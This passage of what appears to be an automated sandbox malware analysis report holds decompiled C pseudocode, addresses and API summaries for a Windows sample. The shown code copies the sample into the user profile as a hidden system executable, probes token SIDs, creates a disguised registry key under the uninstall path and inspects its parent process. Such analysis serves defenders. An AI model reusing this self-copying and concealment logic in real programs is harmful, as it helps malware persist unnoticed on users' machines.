                                                                                                                                                                                                                                                                          				void* _v564;
                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && lstrlenA(_a4) != 0 && lstrlenA(_a8) != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0x104;
                                                                                                                                                                                                                                                                          					if((_a12 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						GetEnvironmentVariableA("USERPROFILE",  &_v284, 0x104);
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						__imp__GetAllUsersProfileDirectoryA( &_v284,  &_v12);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					wnsprintfA( &_v556, 0x103, "%s\\%s.exe",  &_v284, _a8);
                                                                                                                                                                                                                                                                          					if(lstrcmpiA(_a4,  &_v556) != 0 && (_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						CopyFileA(_a4,  &_v556, 0);
                                                                                                                                                                                                                                                                          						SetFileAttributesA( &_v556, 6);
                                                                                                                                                                                                                                                                          						lstrcpyA(_a4,  &_v556);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v560 = E040097A0(0x30d);
                                                                                                                                                                                                                                                                          					_v16 = _v560;
                                                                                                                                                                                                                                                                          					 *((char*)(_v16 + 0x30c)) = _a12;
                                                                                                                                                                                                                                                                          					lstrcpyA(_v16,  &_v556);
                                                                                                                                                                                                                                                                          					lstrcpyA(_v16 + 0x208, _a8);
                                                                                                                                                                                                                                                                          					_t58 = CreateThread(0, 0, E040012D0, _v16, 0, 0); // executed
                                                                                                                                                                                                                                                                          					_v288 = _t58;
                                                                                                                                                                                                                                                                          					if(_v288 == 0) {
                                                                                                                                                                                                                                                                          						_v564 = _v16;
                                                                                                                                                                                                                                                                          						E040097C0(_v564);
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						if(_a20 != 0) {
                                                                                                                                                                                                                                                                          							 *_a20 = _v288;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v8 = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                          0x04001129
                                                                                                                                                                                                                                                                          0x04001134
                                                                                                                                                                                                                                                                          0x04001168
                                                                                                                                                                                                                                                                          0x04001175
                                                                                                                                                                                                                                                                          0x0400119b
                                                                                                                                                                                                                                                                          0x04001177
                                                                                                                                                                                                                                                                          0x04001182
                                                                                                                                                                                                                                                                          0x04001182
                                                                                                                                                                                                                                                                          0x040011bd
                                                                                                                                                                                                                                                                          0x040011d9
                                                                                                                                                                                                                                                                          0x040011f0
                                                                                                                                                                                                                                                                          0x040011ff
                                                                                                                                                                                                                                                                          0x04001210
                                                                                                                                                                                                                                                                          0x04001210
                                                                                                                                                                                                                                                                          0x04001223
                                                                                                                                                                                                                                                                          0x0400122f
                                                                                                                                                                                                                                                                          0x04001238
                                                                                                                                                                                                                                                                          0x04001249
                                                                                                                                                                                                                                                                          0x0400125d
                                                                                                                                                                                                                                                                          0x04001274
                                                                                                                                                                                                                                                                          0x0400127a
                                                                                                                                                                                                                                                                          0x04001287
                                                                                                                                                                                                                                                                          0x040012a6
                                                                                                                                                                                                                                                                          0x040012b3
                                                                                                                                                                                                                                                                          0x04001289
                                                                                                                                                                                                                                                                          0x0400128d
                                                                                                                                                                                                                                                                          0x04001298
                                                                                                                                                                                                                                                                          0x04001298
                                                                                                                                                                                                                                                                          0x0400129a
                                                                                                                                                                                                                                                                          0x0400129a
                                                                                                                                                                                                                                                                          0x04001287
                                                                                                                                                                                                                                                                          0x040012c1

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04001148
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0400115A
                                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 04001182
                                                                                                                                                                                                                                                                            • Part of subcall function 040097C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 040097CF
                                                                                                                                                                                                                                                                            • Part of subcall function 040097C0: RtlFreeHeap.NTDLL(00000000), ref: 040097D6
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 0400119B
                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 040011BD
                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000104,?), ref: 040011D1
                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(00000104,?,00000000), ref: 040011F0
                                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000006), ref: 040011FF
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000104,?), ref: 04001210
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,?), ref: 04001249
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-00000208,00000000), ref: 0400125D
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04001274
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateDirectoryEnvironmentFreeProcessProfileThreadUsersVariablelstrcmpiwnsprintf
                                                                                                                                                                                                                                                                          • String ID: %s\%s.exe$USERPROFILE
                                                                                                                                                                                                                                                                          • API String ID: 1231128424-1744756051
                                                                                                                                                                                                                                                                          • Opcode ID: b85ef1de13e11c0e00b9ed9ca29e0f6effca0754590a52f5089cd6d741d3fe99
                                                                                                                                                                                                                                                                          • Instruction ID: 5a94151192094d4d6073c3e413aca9132142fa07401a96dcdce05a8263d9ef35
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b85ef1de13e11c0e00b9ed9ca29e0f6effca0754590a52f5089cd6d741d3fe99
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A413675904208ABEB54CFA4D889BDE77B4EF48704F00C295F509AA281D779EA84CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                                                                                                          			E040099F0() {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				char _v9;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				char _v1044;
                                                                                                                                                                                                                                                                          				char _v2068;
                                                                                                                                                                                                                                                                          				long _v2072;
                                                                                                                                                                                                                                                                          				void* _v2076;
                                                                                                                                                                                                                                                                          				void* _v2080;
                                                                                                                                                                                                                                                                          				char _v2084;
                                                                                                                                                                                                                                                                          				int _t43;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                          				_v8 = 0x400;
                                                                                                                                                                                                                                                                          				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v16) == 0) {
                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                          					return _v9;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v2072 = 0;
                                                                                                                                                                                                                                                                          				GetTokenInformation(_v16, 1, 0, 0,  &_v2072); // executed
                                                                                                                                                                                                                                                                          				if(_v2072 >= 0x400) {
                                                                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                                                                          					CloseHandle(_v16);
                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v2076 =  &_v1044;
                                                                                                                                                                                                                                                                          				_t43 = GetTokenInformation(_v16, 1, _v2076, _v2072,  &_v2072); // executed
                                                                                                                                                                                                                                                                          				if(_t43 == 0) {
                                                                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v2080 =  &_v2068;
                                                                                                                                                                                                                                                                          				_v2084 = 0x44;
                                                                                                                                                                                                                                                                          				__imp__CreateWellKnownSid(0xc, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                          				if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                          					__imp__CreateWellKnownSid(0x16, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                          					if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                          						__imp__CreateWellKnownSid(0x17, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                          						if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                          							__imp__CreateWellKnownSid(0x18, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                          							if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                          								goto L11;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x040099f9
                                                                                                                                                                                                                                                                          0x040099fd
                                                                                                                                                                                                                                                                          0x04009a19
                                                                                                                                                                                                                                                                          0x04009b80
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009b80
                                                                                                                                                                                                                                                                          0x04009a1f
                                                                                                                                                                                                                                                                          0x04009a3a
                                                                                                                                                                                                                                                                          0x04009a4a
                                                                                                                                                                                                                                                                          0x04009b76
                                                                                                                                                                                                                                                                          0x04009b7a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009b7a
                                                                                                                                                                                                                                                                          0x04009a56
                                                                                                                                                                                                                                                                          0x04009a77
                                                                                                                                                                                                                                                                          0x04009a7f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009a8b
                                                                                                                                                                                                                                                                          0x04009a91
                                                                                                                                                                                                                                                                          0x04009aad
                                                                                                                                                                                                                                                                          0x04009acb
                                                                                                                                                                                                                                                                          0x04009ae6
                                                                                                                                                                                                                                                                          0x04009b04
                                                                                                                                                                                                                                                                          0x04009b1c
                                                                                                                                                                                                                                                                          0x04009b3a
                                                                                                                                                                                                                                                                          0x04009b52
                                                                                                                                                                                                                                                                          0x04009b70
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009b72
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009b3c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009b06
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 04009A0A
                                                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 04009A11
                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04009A3A
                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 04009A77
                                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 04009AAD
                                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?,00000000), ref: 04009AC3
                                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 04009AE6
                                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?), ref: 04009AFC
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04009B7A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                                          • API String ID: 98007406-2746444292
                                                                                                                                                                                                                                                                          • Opcode ID: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
                                                                                                                                                                                                                                                                          • Instruction ID: 7ae4063a6f13a9051a7762c6ae15c07f15253da6e1139fe1377935b2c4657608
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB41F0B5A042189BEB24DF90CC45FDAB3FDFF48700F04C1E4A549A6181DE74AA81DFA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005A00(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                                                                                          				CHAR* _t35;
                                                                                                                                                                                                                                                                          				int _t39;
                                                                                                                                                                                                                                                                          				long _t43;
                                                                                                                                                                                                                                                                          				CHAR* _t51;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0x10) {
                                                                                                                                                                                                                                                                          					E04007D20(_t27, "Sscculmqcxgnq", 0, 0xe);
                                                                                                                                                                                                                                                                          					lstrcpyA("Sscculmqcxgnq", "WDefault");
                                                                                                                                                                                                                                                                          					_t33 = E04005930(_a4 + 0x45b, "Sscculmqcxgnq", 0xd); // executed
                                                                                                                                                                                                                                                                          					E04007D20(_t33, _a8, 0, _a12);
                                                                                                                                                                                                                                                                          					_t35 =  *0x401189c; // 0x400c4e0
                                                                                                                                                                                                                                                                          					if(lstrlenA(_t35) < _a12) {
                                                                                                                                                                                                                                                                          						_t51 =  *0x401189c; // 0x400c4e0
                                                                                                                                                                                                                                                                          						lstrcpyA(_a8, _t51);
                                                                                                                                                                                                                                                                          						_t39 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                          						if(_t39 + lstrlenA(?str?) < _a12) {
                                                                                                                                                                                                                                                                          							lstrcatA(_a8, "Sscculmqcxgnq");
                                                                                                                                                                                                                                                                          							_v12 = 0x80000001;
                                                                                                                                                                                                                                                                          							_v16 = 0;
                                                                                                                                                                                                                                                                          							_v20 = 0;
                                                                                                                                                                                                                                                                          							_t43 = RegCreateKeyExA(_v12, _a8, 0, 0, 0, 0x20006, 0,  &_v16,  &_v20); // executed
                                                                                                                                                                                                                                                                          							if(_t43 != 0) {
                                                                                                                                                                                                                                                                          								E04007D20(_t43, _a8, 0, _a12);
                                                                                                                                                                                                                                                                          								lstrcpyA(_a8, "software\\microsoft\\windows\\currentversion\\uninstall");
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v8 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x04005a07
                                                                                                                                                                                                                                                                          0x04005a12
                                                                                                                                                                                                                                                                          0x04005a35
                                                                                                                                                                                                                                                                          0x04005a47
                                                                                                                                                                                                                                                                          0x04005a5d
                                                                                                                                                                                                                                                                          0x04005a6f
                                                                                                                                                                                                                                                                          0x04005a77
                                                                                                                                                                                                                                                                          0x04005a86
                                                                                                                                                                                                                                                                          0x04005a8c
                                                                                                                                                                                                                                                                          0x04005a97
                                                                                                                                                                                                                                                                          0x04005aa1
                                                                                                                                                                                                                                                                          0x04005ab9
                                                                                                                                                                                                                                                                          0x04005ac8
                                                                                                                                                                                                                                                                          0x04005ace
                                                                                                                                                                                                                                                                          0x04005ad5
                                                                                                                                                                                                                                                                          0x04005adc
                                                                                                                                                                                                                                                                          0x04005b00
                                                                                                                                                                                                                                                                          0x04005b08
                                                                                                                                                                                                                                                                          0x04005b20
                                                                                                                                                                                                                                                                          0x04005b31
                                                                                                                                                                                                                                                                          0x04005b0a
                                                                                                                                                                                                                                                                          0x04005b0e
                                                                                                                                                                                                                                                                          0x04005b0e
                                                                                                                                                                                                                                                                          0x04005b41
                                                                                                                                                                                                                                                                          0x04005b41
                                                                                                                                                                                                                                                                          0x04005ab9
                                                                                                                                                                                                                                                                          0x04005a86
                                                                                                                                                                                                                                                                          0x04005b4b

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(Sscculmqcxgnq,WDefault), ref: 04005A47
                                                                                                                                                                                                                                                                            • Part of subcall function 04005930: CharUpperA.USER32(00000000), ref: 040059E2
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0400C4E0), ref: 04005A7D
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,0400C4E0), ref: 04005A97
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005AA1
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Sscculmqcxgnq), ref: 04005AAE
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Sscculmqcxgnq), ref: 04005AC8
                                                                                                                                                                                                                                                                          • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 04005B00
                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 04005B0E
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,software\microsoft\windows\currentversion\uninstall), ref: 04005B31
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005B3B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
                                                                                                                                                                                                                                                                          • String ID: Sscculmqcxgnq$WDefault$software\microsoft\windows\currentversion\uninstall
                                                                                                                                                                                                                                                                          • API String ID: 4161867159-2182964826
                                                                                                                                                                                                                                                                          • Opcode ID: 6328766250843c22953127ee7e5734f8e2de0c08094b4a1cb46197edb91ced3c
                                                                                                                                                                                                                                                                          • Instruction ID: 2f1465acc8a4d9a659e2af8a658b36752d7f83b1b7b92a7dc582af9786930c23
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6328766250843c22953127ee7e5734f8e2de0c08094b4a1cb46197edb91ced3c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40310775600208FBEB14DFA4DC49FAA37B9EB44708F04C615FA15BB281D7B8AA50CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                                                                                                          			E04001CA0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				char _v272;
                                                                                                                                                                                                                                                                          				long _v284;
                                                                                                                                                                                                                                                                          				intOrPtr _v300;
                                                                                                                                                                                                                                                                          				void* _v308;
                                                                                                                                                                                                                                                                          				void* _v312;
                                                                                                                                                                                                                                                                          				long _v316;
                                                                                                                                                                                                                                                                          				long _v320;
                                                                                                                                                                                                                                                                          				void* _v324;
                                                                                                                                                                                                                                                                          				char _v328;
                                                                                                                                                                                                                                                                          				int _v332;
                                                                                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                                                                                          				int _t47;
                                                                                                                                                                                                                                                                          				int _t50;
                                                                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				_t44 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                                                                                                                                          				_v312 = _t44;
                                                                                                                                                                                                                                                                          				if(_v312 == 0xffffffff) {
                                                                                                                                                                                                                                                                          					L18:
                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v308 = 0x128;
                                                                                                                                                                                                                                                                          				_t47 = Process32First(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                                          				if(_t47 == 0) {
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					CloseHandle(_v312);
                                                                                                                                                                                                                                                                          					goto L18;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v320 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                          				_v316 = 0;
                                                                                                                                                                                                                                                                          				while(_v300 != _v320) {
                                                                                                                                                                                                                                                                          					_t50 = Process32Next(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                                          					if(_t50 != 0) {
                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                                                                          					if(_v316 != 0 && Process32First(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                          						while(_v300 != _v316) {
                                                                                                                                                                                                                                                                          							if(Process32Next(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(lstrlenA( &_v272) < _a8) {
                                                                                                                                                                                                                                                                          							lstrcpyA(_a4,  &_v272);
                                                                                                                                                                                                                                                                          							_v324 = OpenProcess(0x410, 0, _v316);
                                                                                                                                                                                                                                                                          							if(_v324 != 0) {
                                                                                                                                                                                                                                                                          								_v332 = 0;
                                                                                                                                                                                                                                                                          								_push( &_v332);
                                                                                                                                                                                                                                                                          								_push(4);
                                                                                                                                                                                                                                                                          								_push( &_v328);
                                                                                                                                                                                                                                                                          								_t61 = _v324;
                                                                                                                                                                                                                                                                          								_push(_t61); // executed
                                                                                                                                                                                                                                                                          								L0400B1D4(); // executed
                                                                                                                                                                                                                                                                          								if(_t61 == 0) {
                                                                                                                                                                                                                                                                          									_push(_a8);
                                                                                                                                                                                                                                                                          									_push(_a4);
                                                                                                                                                                                                                                                                          									_push(_v324); // executed
                                                                                                                                                                                                                                                                          									L0400B1C8(); // executed
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_push(_a8);
                                                                                                                                                                                                                                                                          									_push(_a4);
                                                                                                                                                                                                                                                                          									_push(_v328);
                                                                                                                                                                                                                                                                          									_push(_v324);
                                                                                                                                                                                                                                                                          									L0400B1CE();
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v5 = 1;
                                                                                                                                                                                                                                                                          								FindCloseChangeNotification(_v324); // executed
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v316 = _v284;
                                                                                                                                                                                                                                                                          				goto L6;
                                                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                                                          0x04001ca9
                                                                                                                                                                                                                                                                          0x04001cb1
                                                                                                                                                                                                                                                                          0x04001cb6
                                                                                                                                                                                                                                                                          0x04001cc3
                                                                                                                                                                                                                                                                          0x04001e51
                                                                                                                                                                                                                                                                          0x04001e57
                                                                                                                                                                                                                                                                          0x04001e57
                                                                                                                                                                                                                                                                          0x04001cc9
                                                                                                                                                                                                                                                                          0x04001ce1
                                                                                                                                                                                                                                                                          0x04001ce8
                                                                                                                                                                                                                                                                          0x04001e44
                                                                                                                                                                                                                                                                          0x04001e4b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001e4b
                                                                                                                                                                                                                                                                          0x04001cf4
                                                                                                                                                                                                                                                                          0x04001cfa
                                                                                                                                                                                                                                                                          0x04001d04
                                                                                                                                                                                                                                                                          0x04001d2e
                                                                                                                                                                                                                                                                          0x04001d35
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001d37
                                                                                                                                                                                                                                                                          0x04001d3e
                                                                                                                                                                                                                                                                          0x04001d5f
                                                                                                                                                                                                                                                                          0x04001e3e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001e3e
                                                                                                                                                                                                                                                                          0x04001d81
                                                                                                                                                                                                                                                                          0x04001d92
                                                                                                                                                                                                                                                                          0x04001dac
                                                                                                                                                                                                                                                                          0x04001db9
                                                                                                                                                                                                                                                                          0x04001dbb
                                                                                                                                                                                                                                                                          0x04001dcb
                                                                                                                                                                                                                                                                          0x04001dcc
                                                                                                                                                                                                                                                                          0x04001dd4
                                                                                                                                                                                                                                                                          0x04001dd5
                                                                                                                                                                                                                                                                          0x04001ddb
                                                                                                                                                                                                                                                                          0x04001ddc
                                                                                                                                                                                                                                                                          0x04001de3
                                                                                                                                                                                                                                                                          0x04001e05
                                                                                                                                                                                                                                                                          0x04001e09
                                                                                                                                                                                                                                                                          0x04001e10
                                                                                                                                                                                                                                                                          0x04001e11
                                                                                                                                                                                                                                                                          0x04001de5
                                                                                                                                                                                                                                                                          0x04001de8
                                                                                                                                                                                                                                                                          0x04001dec
                                                                                                                                                                                                                                                                          0x04001df3
                                                                                                                                                                                                                                                                          0x04001dfa
                                                                                                                                                                                                                                                                          0x04001dfb
                                                                                                                                                                                                                                                                          0x04001dfb
                                                                                                                                                                                                                                                                          0x04001e16
                                                                                                                                                                                                                                                                          0x04001e21
                                                                                                                                                                                                                                                                          0x04001e21
                                                                                                                                                                                                                                                                          0x04001db9
                                                                                                                                                                                                                                                                          0x04001e27
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001d3e
                                                                                                                                                                                                                                                                          0x04001d18
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04001CB1
